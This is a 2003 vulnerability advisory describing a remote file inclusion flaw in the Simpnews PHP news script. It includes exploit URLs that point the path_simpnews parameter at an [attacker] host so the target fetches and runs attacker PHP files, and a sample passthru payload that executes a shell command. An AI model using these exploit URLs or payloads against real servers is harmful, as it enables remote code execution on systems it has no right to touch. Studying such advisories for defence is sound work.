|
original File name : PUPET-simpnews.txt date releases : july 15, 2003 Informations : ========================= Advisory Name: Simpnews include file Vulnerability Author: PUPET <pupet@cosmo.com> Discover by: PUPET <pupet@cosmo.com> Website vendor : http://www.boesch-it.de/ Versions : tested on V2.01 -> V2.13 Problem : Include file PHP Code/Location : ========================= /eventscroller.php : --------------------------- ... require_once($path_simpnews.'/config.php'); require_once($path_simpnews.'/functions.php'); if(!isset($category)) $category=0; if(!isset($lang) || !$lang) ... -------------------------- /eventcal2.php : --------------------------- ... if(!isset($lastvisitdate)) $lastvisitdate=0; require_once($path_simpnews.'/config.php'); require_once($path_simpnews.'/functions.php'); include_once($path_simpnews.'/includes/has_entries.inc'); ... --------------------------- Exploits : =============== http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/ with http://[attacker]/config.php http://[attacker]/functions.php http://[attacker]/includes/has_entries.inc or http://[target]/eventscroller.php?path_simpnews=http://[attacker]/ with http://[attacker]/config.php http://[attacker]/functions.php Example for config.php on http://[attacker]/ ================== <? passthru("uname -a"); ?> Vendor Response: ============== Not contacted yet Patch : ============= will post soon at http://www.cracxer.or.id . reference : ============= http://www.pupet.net/cracxerfiles ============== This bugs Discover by : PUPET members of cracxer.or.id sub-devision security focus (www.cracxer.or.id) Thanks to : ============ kaka-joe , pak-tani, Bewok , AxAL , ^BuBuR^aYaM^ , Ernesto_che_guevarra , Babah, Idon Schatje , juventini , Headup , Quervo , kecap , notts , Kemo (candyman) and all crew #cracxer, #dhegleng, #minangcrew, #indocracker at @dalnet By : ============ PUPET (no more mr nice guy)